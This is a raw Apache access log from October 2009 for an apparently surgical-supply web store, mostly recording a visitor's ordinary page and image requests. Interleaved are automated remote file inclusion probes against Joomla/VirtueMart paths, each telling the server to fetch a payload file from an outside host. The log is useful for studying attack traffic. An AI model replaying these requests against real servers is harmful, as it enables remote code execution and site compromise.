82.193.15.3 - - [22/Oct/2009:01:19:09 -0400] "GET /logs/error_log.Q109061000%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:19:09 -0400] "GET /logs/access_log.Q109051300%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
70.4.32.212 - - [22/Oct/2009:01:19:09 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76790 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:12 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:14 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:15 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:15 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:16 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:16 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:16 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:16 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:17 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:17 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:17 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:17 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:17 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
62.182.62.35 - - [22/Oct/2009:01:19:18 -0400] "GET /mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
62.182.62.35 - - [22/Oct/2009:01:19:18 -0400] "GET /logs/mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
62.182.62.35 - - [22/Oct/2009:01:19:18 -0400] "GET /logs/access_log.Q109062400/mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
70.4.32.212 - - [22/Oct/2009:01:19:19 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:19 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:19 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:19 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:19 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:20 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
82.193.15.3 - - [22/Oct/2009:01:19:21 -0400] "GET /logs/error_log.Q109072100%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
70.4.32.212 - - [22/Oct/2009:01:19:21 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:22 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:22 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:22 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:22 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:22 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:23 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
82.193.15.3 - - [22/Oct/2009:01:19:24 -0400] "GET /logs/error_log.Q109091700%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
70.4.32.212 - - [22/Oct/2009:01:19:24 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:19:25 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
58.230.118.81 - - [22/Oct/2009:01:19:33 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:19:33 -0400] "GET /logs/access_log.Q109082600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:19:33 -0400] "GET /logs/error_log.Q109072500%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:19:33 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:19:38 -0400] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:19:38 -0400] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:19:38 -0400] "GET /logs/access_log.Q109070400//components/com_virtuemart/export.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
62.182.62.35 - - [22/Oct/2009:01:19:38 -0400] "GET /logs/access_log.Q109061200/mambots/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
82.193.15.3 - - [22/Oct/2009:01:19:40 -0400] "GET /logs/error_log.Q109051300%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
174.133.148.98 - - [22/Oct/2009:01:19:41 -0400] "GET /logs/access_log.Q109062900/index.php?option=http://www.gwanmunsa.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:19:44 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:19:44 -0400] "GET /logs/access_log.Q109082600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:19:44 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
123.125.66.92 - - [22/Oct/2009:01:19:49 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
82.193.15.3 - - [22/Oct/2009:01:19:57 -0400] "GET /logs/error_log.Q109081500%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:20:39 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:20:45 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
222.231.1.214 - - [22/Oct/2009:01:21:12 -0400] "GET /logs/error_log.Q109070400//components/com_virtuemart/export.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
70.4.32.212 - - [22/Oct/2009:01:21:26 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
222.231.1.214 - - [22/Oct/2009:01:21:33 -0400] "GET /logs/error_log.Q109070400//components/com_virtuemart/export.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
70.4.32.212 - - [22/Oct/2009:01:21:29 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG HTTP/1.1" 200 37522 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:41 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:43 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:44 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:44 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:44 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:45 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:45 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:45 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:46 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:47 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:48 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:48 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:48 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:50 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:52 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:55 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:55 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:55 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:55 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:56 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:56 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:56 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:56 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:57 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:57 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:21:57 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4A8C69620061E908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:22:14 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4080991200F19908L+M37+ENG HTTP/1.1" 200 37522 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:22:35 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AA4080991200F19908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
